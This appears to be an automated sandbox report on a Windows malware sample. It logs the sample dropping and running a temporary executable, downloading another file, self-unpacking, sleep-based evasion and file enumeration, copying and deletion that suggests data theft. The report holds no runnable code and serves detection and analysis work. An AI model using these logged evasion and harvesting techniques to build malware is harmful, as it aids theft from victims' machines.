Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Process created: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe "C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe"
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4416 -s 1360
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Process created: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe "C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe"	Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Unpacked PE file: 0.2.LXS5itpTK7.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Unpacked PE file: 2.2.B5F8.tmp.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Unpacked PE file: 0.2.LXS5itpTK7.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Unpacked PE file: 2.2.B5F8.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0054339D push 00000003h; ret	0_2_005433A1
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_005415F2 push es; iretd	0_2_00541603
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_005459AA pushad ; ret	0_2_005459C6
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00545B28 push ecx; ret	0_2_00545B45
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_00542EFC pushad ; ret	0_2_00542F24
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0216799F push esp; retf	0_2_021679A7
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_021409CD push ecx; ret	0_2_021409E0
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0214CE18 push ss; retf	0_2_0214CE1D
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02167F9D push esp; retf	0_2_02167F9E
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_0213FFF3 push ecx; ret	0_2_02140006
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02169DE8 pushad ; retf	0_2_02169DEF
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DC893 push ebx; iretd	2_2_008DC8BE
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008D80B7 push ebx; ret	2_2_008D811C
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008D90D7 push 00000032h; retf	2_2_008D90D9
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DA14B pushad ; iretd	2_2_008DA1C8
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DAF5D push ebp; iretd	2_2_008DAF90
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DBA54 push edx; iretd	2_2_008DBA65
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DA056 push B35707CFh; iretd	2_2_008DA14A
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DA056 pushad ; iretd	2_2_008DA1C8
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_008DC851 pushad ; retf	2_2_008DC852
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021C7B2C push ecx; ret	2_2_021C7B3F

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	File created: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Window / User API: threadDelayed 481			Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Window / User API: threadDelayed 9504			Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-65551

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	API coverage: 4.8 %

Source: C:\Users\user\Desktop\LXS5itpTK7.exe TID: 5668	Thread sleep count: 481 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe TID: 5668	Thread sleep time: -347282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe TID: 5668	Thread sleep count: 9504 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LXS5itpTK7.exe TID: 5668	Thread sleep time: -6861888s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_004389F2 FindFirstFileExW,	0_2_004389F2
Source: C:\Users\user\Desktop\LXS5itpTK7.exe	Code function: 0_2_02168C59 FindFirstFileExW,	0_2_02168C59
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B1EA7 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021B1EA7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B3F27 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021B3F27
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BCF47 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021BCF47
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021ADFD7 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021ADFD7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A1807 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021A1807
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021A1820 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,	2_2_021A1820
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B1827 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021B1827
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BE0B7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,	2_2_021BE0B7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BD8A7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021BD8A7
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021B5127 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,	2_2_021B5127
Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe	Code function: 2_2_021BE597 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,	2_2_021BE597

Source: C:\Users\user\AppData\Local\Temp\B5F8.tmp.exe

Code function: 2_2_021C33F7 GetSystemInfo,wsprintfA,

2_2_021C33F7

Source: Amcache.hve.5.dr	Binary or memory string: VMware
Source: Amcache.hve.5.dr	Binary or memory string: VMware Virtual USB Mouse
